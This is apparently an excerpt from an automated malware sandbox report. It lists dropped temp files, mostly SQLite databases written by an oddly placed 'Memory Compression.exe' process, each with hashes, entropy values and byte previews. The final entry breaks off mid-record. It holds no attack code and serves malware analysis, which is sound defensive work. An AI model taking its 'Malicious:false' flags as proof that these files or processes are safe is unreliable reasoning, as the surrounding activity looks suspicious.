                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\PQjKP1kq0L

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\PUAckDxXEf

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Ph9lkOkIlW

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\PljBRf0PY8

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\PwK3v3wEeE

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Q5FfS09dSx

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\QLjx71dLzS

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\RBxcYJUNYG

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\RESED84.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Sat Jan 11 15:56:27 2025, 1st section name ".debug$S"
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1924
                                                                                                                                Entropy (8bit):4.610534862799923
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:HFl9m9eLz6XiG8HowKqxmNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ScN:llHLza8XKqxmslmuulB+hnqXSfbNtmhn
                                                                                                                                MD5:4FE7ECDD53F731522134ADE28AE0BF9B
                                                                                                                                SHA1:17B0910D53DD0D2527FF01F496EFBA662BD2E1E2
                                                                                                                                SHA-256:0BF1F0EFCBF716557672BECB9FCC5845D59823DEFDCE402847B282D2CB9069B5
                                                                                                                                SHA-512:2B18843D779C52FDF1BB164480240A755DC9C389B98B267584AB44051D57C3F963C0072896940A830FCEE39AFB330B92B076EBEB4F62F4D9077D04F82CF41559
                                                                                                                                Malicious:false
                                                                                                                                Preview:L......g.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........X....c:\Program Files (x86)\Microsoft\Edge\Application\CSC2936DBF6B4C2EB0AEC72C42A91573.TMP...................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RESED84.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.

                                                                                                                                C:\Users\user\AppData\Local\Temp\RESEF49.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Sat Jan 11 15:56:28 2025, 1st section name ".debug$S"
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1956
                                                                                                                                Entropy (8bit):4.5565822655036765
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:H0O9/OyvsqHdwKqxmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:EyvsqeKqxmEluOulajfqXSfbNtmh1Z
                                                                                                                                MD5:10442F032B4DC472EBBE61370B02C54F
                                                                                                                                SHA1:76F6724EC664EAEEFFA7703C011655A83560C65B
                                                                                                                                SHA-256:F4DBA5D5F352C750FA4BD26FC68510C57A4F36F9BD61DF4609B482887D8699BF
                                                                                                                                SHA-512:43741EEF75D626B3D8C6BDA97852279E04C8D6BEFCC68A07BA78EB4195DA4473CB5F2583029D833883DE0523D322318D9B2C03FEFE0E3E6FBBBD09D5B1159EB4
                                                                                                                                Malicious:false
                                                                                                                                Preview:L......g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC98778A6FB9344578AD1F444CFDF09EF9.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RESEF49.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                                                                                                C:\Users\user\AppData\Local\Temp\RhdavfjrXZ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\SO218ufXNq

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\SYeqP4jYOv

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\SnRuQ3wBje

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Su9xq20fwW

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\TKXiZQJbfd

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\TdeyTRVSMT

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\U3Z3CVLkQM

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\UN9CtddIIS

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\UXDlbUt3Vn

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Ua0TxQsSyt

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
